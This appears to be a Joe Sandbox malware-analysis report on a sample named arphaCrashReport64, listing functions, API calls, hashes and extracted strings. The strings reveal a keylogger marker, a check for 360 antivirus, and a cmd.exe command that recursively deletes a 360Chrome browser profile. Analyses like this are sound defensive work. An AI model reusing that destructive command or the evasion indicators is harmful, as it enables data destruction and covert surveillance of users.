                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo_lockfree
                                            • String ID:
                                            • API String ID: 545175899-0
                                            • Opcode ID: 57a3e14ff19d228fc4fb1404de0338fa2b2075d3f3262c611f483b0a365b67db
                                            • Instruction ID: 64bf94970f8097bbf4820564ce1fa2c4bb7c51a403858acbe98e3e4b5a2c9bc6
                                            • Opcode Fuzzy Hash: 57a3e14ff19d228fc4fb1404de0338fa2b2075d3f3262c611f483b0a365b67db
                                            • Instruction Fuzzy Hash: A4319670524E0D8FEF56EFA5844A3EE77E9FB94310F22452A9C06D369ECB30C4888795
                                            Function 0000024B6458D060 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 4069110180-1405518554
                                            • Opcode ID: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction ID: 213ebcd6908bf6ecb7bc42150a46620f4431321f7ba67aa45c411316dd00527e
                                            • Opcode Fuzzy Hash: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction Fuzzy Hash: E4414636201F8098EB12DF60E4683AD33AAEB4479CF454526EF4D57A9DDF34C559C308
                                            Function 0000024B645942A4 Relevance: 10.6, APIs: 7, Instructions: 93threadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0000024B645983F4: HeapCreate.KERNELBASE ref: 0000024B6459840A
                                              • Part of subcall function 0000024B645983F4: GetVersion.KERNEL32 ref: 0000024B6459841C
                                              • Part of subcall function 0000024B645983F4: HeapSetInformation.KERNEL32 ref: 0000024B6459843A
                                            • _RTC_Initialize.LIBCMT ref: 0000024B645942D6
                                            • GetCommandLineA.KERNEL32 ref: 0000024B645942DB
                                              • Part of subcall function 0000024B6459976C: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000024B645942ED), ref: 0000024B64599785
                                              • Part of subcall function 0000024B6459976C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,0000024B645942ED), ref: 0000024B645997DC
                                              • Part of subcall function 0000024B6459976C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,0000024B645942ED), ref: 0000024B64599817
                                              • Part of subcall function 0000024B6459976C: free.LIBCMT ref: 0000024B64599824
                                              • Part of subcall function 0000024B6459976C: FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000024B645942ED), ref: 0000024B6459982F
                                              • Part of subcall function 0000024B6459902C: GetStartupInfoW.KERNEL32 ref: 0000024B6459904D
                                            • __setargv.LIBCMT ref: 0000024B64594304
                                            • _cinit.LIBCMT ref: 0000024B64594318
                                              • Part of subcall function 0000024B645947F4: FlsFree.KERNEL32(?,?,?,?,0000024B64594382), ref: 0000024B64594803
                                              • Part of subcall function 0000024B645947F4: RtlDeleteCriticalSection.NTDLL ref: 0000024B64599A43
                                              • Part of subcall function 0000024B645947F4: free.LIBCMT ref: 0000024B64599A4C
                                              • Part of subcall function 0000024B645947F4: RtlDeleteCriticalSection.NTDLL ref: 0000024B64599A73
                                              • Part of subcall function 0000024B6459537C: Sleep.KERNEL32(?,?,ceil,0000024B64594907,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B645953C1
                                            • FlsSetValue.KERNEL32 ref: 0000024B645943B2
                                            • GetCurrentThreadId.KERNEL32 ref: 0000024B645943C6
                                            • free.LIBCMT ref: 0000024B645943D5
                                              • Part of subcall function 0000024B64593D28: HeapFree.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D3E
                                              • Part of subcall function 0000024B64593D28: _errno.LIBCMT ref: 0000024B64593D48
                                              • Part of subcall function 0000024B64593D28: GetLastError.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
                                            • String ID:
                                            • API String ID: 125979975-0
                                            • Opcode ID: 37b4e0c4565de308d4cd786e8218033d40196c5ea1367a114a56c7de8a0c3825
                                            • Instruction ID: f601e68573be06a5c75e019b11787f6bc7757fb3e9b3f50f4cac4f0f9298bf09
                                            • Opcode Fuzzy Hash: 37b4e0c4565de308d4cd786e8218033d40196c5ea1367a114a56c7de8a0c3825
                                            • Instruction Fuzzy Hash: B2315C2060DEC186FAAB7B71584D36E228F6B27355F174125DB35852DFEB24CC81826E
                                            Function 00007FFDFB8B7EB6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$ExceptionRaise
                                            • String ID: csm
                                            • API String ID: 2255768072-1018135373
                                            • Opcode ID: 7cc8670d35e4c01d6a0e92c0c42231d198be58cd754d693a2b5f7d567934e0f1
                                            • Instruction ID: 4a877af0283f11656d08d2de18fa65470818303ed95e95acab25ea4f9de345b0
                                            • Opcode Fuzzy Hash: 7cc8670d35e4c01d6a0e92c0c42231d198be58cd754d693a2b5f7d567934e0f1
                                            • Instruction Fuzzy Hash: F931593661974386EB60DF21E068A6D3764FBC47A1F018236DA6D037E9CF39E445CB44
                                            Function 00007FFDFB8B4374 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                            • String ID:
                                            • API String ID: 1024173049-0
                                            • Opcode ID: 4dfbc259c503659c9f50e031569fa077f3fd3320b06307f34012312d2743a21e
                                            • Instruction ID: 786c65b2539ff17376566bdc35fc30e07a7b88be28a1e64b4ae712de2ec7fa86
                                            • Opcode Fuzzy Hash: 4dfbc259c503659c9f50e031569fa077f3fd3320b06307f34012312d2743a21e
                                            • Instruction Fuzzy Hash: 14214A21B7B64382E768AB71A471F7A2294AFC4744F489434E56E476EACF3CE4508F80
                                            Function 0000024B645920E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpylstrlenwsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnowW
                                            • API String ID: 2137660125-763317463
                                            • Opcode ID: dcea012c4cec8c2c86aa07fbe8fa18e7c6b084d16e7e0d36b23a3dafce76063e
                                            • Instruction ID: 1b46c8b650463d59d30e846af4db201edca7d5bdda99e1ca6d55eeff632ff48e
                                            • Opcode Fuzzy Hash: dcea012c4cec8c2c86aa07fbe8fa18e7c6b084d16e7e0d36b23a3dafce76063e
                                            • Instruction Fuzzy Hash: D3114C21318EC182EB21DF21E85939AA36AFBD9784F860012EB4D47A5DEF3DC159CB05
                                            Function 0000024B6458DCA0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                            • String ID:
                                            • API String ID: 4202892810-0
                                            • Opcode ID: d38896a3890081b88ef905279f1f8f3bcd07668c588b65e7c678813c6d7bd9a0
                                            • Instruction ID: e779da781253b10dae268dd763457b01b1c103be585f2e83a2b794966243c49e
                                            • Opcode Fuzzy Hash: d38896a3890081b88ef905279f1f8f3bcd07668c588b65e7c678813c6d7bd9a0
                                            • Instruction Fuzzy Hash: 65115175605E8086FB558B51F81C71573A6FB88BA8F054216DA6A43BE8DF7CC0898B09
                                            Function 0000024B6458E1F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34sleepsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CreateFileHandleMutex$Closelstrlen$DeleteErrorFolderLastModuleObjectPathReleaseSingleSizeSleepStateWaitlstrcatwsprintf
                                            • String ID: K^e^y^L^o^g^g^e^r
                                            • API String ID: 809812578-2826508260
                                            • Opcode ID: 89460a35c748eb327358448a72d58bcfd2f9277bad92bf41dea310a58b81c931
                                            • Instruction ID: 3e6dafdafc24be5b53373741c800218234b3a607488dec47595b7a5d27e8179d
                                            • Opcode Fuzzy Hash: 89460a35c748eb327358448a72d58bcfd2f9277bad92bf41dea310a58b81c931
                                            • Instruction Fuzzy Hash: 6101AD31504E81C6EB869B21F84C26E33BBF785780F465026E64B866ADDF38C4DD8708
                                            Function 0000024B6458FB30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34sleeplibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual$Create$CurrentProcess$ButtonCheckedCloseFileFindHandleLibraryLoadLogonSleepSnapshotThreadToolhelp32WindowWith
                                            • String ID: Q360SafeMonClass$user32.dll
                                            • API String ID: 200090976-537184153
                                            • Opcode ID: 921665ad5ac78c43fd3a9f23d873db2a3a650aae6eac6ae2d962f46c08df0d72
                                            • Instruction ID: 6a27523273f7d2d0bd46c5f575c2eae911652a3f0ccd43c74c490a2e4f2094c4
                                            • Opcode Fuzzy Hash: 921665ad5ac78c43fd3a9f23d873db2a3a650aae6eac6ae2d962f46c08df0d72
                                            • Instruction Fuzzy Hash: 6BF02B11711E504BFB13A771DC6D369139F6F8C741F0B14218906412DDFF2CC888821D
                                            Function 0000024B6458EC62 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 25processCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CreateExecFolderKnownPathSnapshotToolhelp32wsprintf
                                            • String ID: 360chrome.exe$360se.exe$360se6.exe$\AppData\Roaming\360se6\User Data\Default$cmd.exe /c rmdir /s /q "%userprofile%\AppData\Local\360Chrome\Chrome\User Data\Default"
                                            • API String ID: 3785949191-1706831714
                                            • Opcode ID: d1eaf7f8e489474969b91f961f9eca55b1cc3b354283557bd717e9cd878dd9fd
                                            • Instruction ID: ffcb8dd579e6839a8c27ed59d5934bf01a6b5a527aa19d830c4976f7a95a53f2
                                            • Opcode Fuzzy Hash: d1eaf7f8e489474969b91f961f9eca55b1cc3b354283557bd717e9cd878dd9fd
                                            • Instruction Fuzzy Hash: D5F0D025611E1154FB57EB25EC5D3A513AFA75CB44F8F14139909831AEEF2CC18EC308
                                            Function 0000024B642B0AA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 3186804695-2671469338
                                            • Opcode ID: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction ID: 5b09a76ea0350808c29ec4014885356100a52c88c3eba58c5781bd1123bab0fd
                                            • Opcode Fuzzy Hash: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction Fuzzy Hash: D6F0C0344609048EEE576B68814E3A431E8FF19309F6759A999448A1AFDBFCC8C88B56
                                            Function 0000024B645A10F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$_amsg_exit
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 2610988583-2671469338
                                            • Opcode ID: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction ID: 75ac9d7d009db1b4d11bf40440359a49a3b55deb35c8a776a9706d66fa268df8
                                            • Opcode Fuzzy Hash: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction Fuzzy Hash: 22F06D36A009C5C6E757AB60C04D3AC39EAE799705F9B8072C7504238BC7BCC8D48B16
                                            Function 0000024B642AD470 Relevance: 9.3, APIs: 6, Instructions: 293COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno$_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 3760323483-0
                                            • Opcode ID: f6f2cbfcb04b39f03fd32e05ec31852a2d6f70f061b4e20e682d57eae25433b6
                                            • Instruction ID: aa46f8c1efe702f491b618d1364153a14363dfce372da1320ed85af2ae06eb67
                                            • Opcode Fuzzy Hash: f6f2cbfcb04b39f03fd32e05ec31852a2d6f70f061b4e20e682d57eae25433b6
                                            • Instruction Fuzzy Hash: A3910430638E488FEF1AAF68D4897B877E9FB55301F250129DC8AC719EDB24D48A8745
                                            Function 0000024B642A58A8 Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_errno_getptd$_lockmalloc
                                            • String ID:
                                            • API String ID: 1369581901-0
                                            • Opcode ID: dfd48de12b3e966387c16bd8cfcff08fc85f586fa0c636f5f2138c5d3ae57c13
                                            • Instruction ID: 1cbdf6bf074a73280d8d732042de8231d4e522c4d238f95aacbed3330b08a6ea
                                            • Opcode Fuzzy Hash: dfd48de12b3e966387c16bd8cfcff08fc85f586fa0c636f5f2138c5d3ae57c13
                                            • Instruction Fuzzy Hash: CA51C130628E054EEF92DB2894857AA77D9FB48310F364159DC49C729FDB34D8CA878A
                                            Function 0000024B64595EF0 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 0000024B64595F0F
                                              • Part of subcall function 0000024B64594958: _amsg_exit.LIBCMT ref: 0000024B6459496E
                                              • Part of subcall function 0000024B64595B2C: _getptd.LIBCMT ref: 0000024B64595B36
                                              • Part of subcall function 0000024B64595B2C: _amsg_exit.LIBCMT ref: 0000024B64595BD3
                                              • Part of subcall function 0000024B64595BE8: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,0000024B64595F2A,?,?,?,?,?,0000024B645960E7), ref: 0000024B64595C12
                                              • Part of subcall function 0000024B645952FC: malloc.LIBCMT ref: 0000024B64595327
                                              • Part of subcall function 0000024B645952FC: Sleep.KERNEL32(?,?,ceil,0000024B64599B11,?,?,?,0000024B64599BBB,?,?,00000000,0000024B64594875,?,?,00000000,0000024B6459492C), ref: 0000024B6459533A
                                            • free.LIBCMT ref: 0000024B64595F9A
                                              • Part of subcall function 0000024B64593D28: HeapFree.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D3E
                                              • Part of subcall function 0000024B64593D28: _errno.LIBCMT ref: 0000024B64593D48
                                              • Part of subcall function 0000024B64593D28: GetLastError.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D50
                                            • _lock.LIBCMT ref: 0000024B64595FCA
                                            • free.LIBCMT ref: 0000024B6459606D
                                            • free.LIBCMT ref: 0000024B64596099
                                            • _errno.LIBCMT ref: 0000024B6459609E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                            • String ID:
                                            • API String ID: 3894533514-0
                                            • Opcode ID: eb00640c03e47e874c894215d7be1c1520d5e1d63ad340f99a6365e368a02bbf
                                            • Instruction ID: 405262597facb8479c210444e6903b81a5ce0736dba28c6cfa7fed730bd97cc1
                                            • Opcode Fuzzy Hash: eb00640c03e47e874c894215d7be1c1520d5e1d63ad340f99a6365e368a02bbf
                                            • Instruction Fuzzy Hash: 48511136600EC096EB668B21A49836E77AFF780B84F1A8116DB5A4739ECB78C405C748
                                            Function 0000024B642A856C Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo_lockcalloc
                                            • String ID:
                                            • API String ID: 2577527384-0
                                            • Opcode ID: 2f70ec6ef3d5c3994c8657d7c15eef66e98feaa01b428a6d9299e4e104dbd0a3
                                            • Instruction ID: c70f0de5c025669734520d57d0eb44e81606071f869745e3b2a492c6a82f6ef7
                                            • Opcode Fuzzy Hash: 2f70ec6ef3d5c3994c8657d7c15eef66e98feaa01b428a6d9299e4e104dbd0a3
                                            • Instruction Fuzzy Hash: 3C319270634E494FEB56AF6D440A329B3D9FB58300F6705699C49C729EDB30DC88878A
                                            Function 0000024B642A9468 Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _set_error_mode$_errno$_lockfreemalloc
                                            • String ID:
                                            • API String ID: 360200360-0
                                            • Opcode ID: 73ae3fb5c7c4ccbaaf4f8d4c4d45a553f7f84ec8388a2a8c33d3473ba375301a
                                            • Instruction ID: 0612c2e3298ee8952303a195b9363f054e9f0fcc946231ce376a149d0d84a6bb
                                            • Opcode Fuzzy Hash: 73ae3fb5c7c4ccbaaf4f8d4c4d45a553f7f84ec8388a2a8c33d3473ba375301a
                                            • Instruction Fuzzy Hash: 05218130124E09CFFF66BF66D4193A977D8EB54350FA20829A809C32DEDB75C8D88749
                                            Function 0000024B64598BB4 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$CurrentProcess_amsg_exit_invalid_parameter_noinfo_lockcalloc
                                            • String ID:
                                            • API String ID: 1209116363-0
                                            • Opcode ID: 3d055b34e79a5cda464dcf1f1aea2af4a9904d0a9e2e1322d776b52311ff47c0
                                            • Instruction ID: 1e24d0c28db06ba5d38ed51d4f69e0461c9cccf911d32d4585d253e565299d44
                                            • Opcode Fuzzy Hash: 3d055b34e79a5cda464dcf1f1aea2af4a9904d0a9e2e1322d776b52311ff47c0
                                            • Instruction Fuzzy Hash: 6121C432312F81C2FB16AF61A54935E629BFB45BC0F4A4424EF495B78EDF38C8148309
                                            Function 0000024B6459976C Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                            • String ID:
                                            • API String ID: 517548149-0
                                            • Opcode ID: e92270d1c1e25466c38415bf8e68df5b368d6513ed967c410428f0e42ef408fa
                                            • Instruction ID: 532372deb0ac545013114e17f55a1f18a6b1e6b68803a985b9701b42159fe77b
                                            • Opcode Fuzzy Hash: e92270d1c1e25466c38415bf8e68df5b368d6513ed967c410428f0e42ef408fa
                                            • Instruction Fuzzy Hash: CD214F32A05FC0C6EB669F21A41825D77EAFB89BC4F494029DE8A07B58DF38C451C709
                                            Function 0000024B642A8448 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$__doserrno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 4115123133-0
                                            • Opcode ID: 6bd33e9cc88758b05f4ffe04088cbd09dc5e0fe9f91c9aa33adb7de791cfd3bc
                                            • Instruction ID: a8d88c9d56f5c921610b14340d52326f0ab7f398a1ed8e7a551c10f3b168349a
                                            • Opcode Fuzzy Hash: 6bd33e9cc88758b05f4ffe04088cbd09dc5e0fe9f91c9aa33adb7de791cfd3bc
                                            • Instruction Fuzzy Hash: F4014FB0620E404BFF672BB5485E3BD369C9B12326F730554AE61862EED724CCCC5679
                                            Function 00007FFDFB8B29C0 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD,?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B29CA
                                            • FlsGetValue.KERNEL32(?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD,?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B29D8
                                            • SetLastError.KERNEL32(?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD,?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B2A30
                                              • Part of subcall function 00007FFDFB8B2CD0: Sleep.KERNEL32(?,?,?,00007FFDFB8B29F3,?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD), ref: 00007FFDFB8B2D15
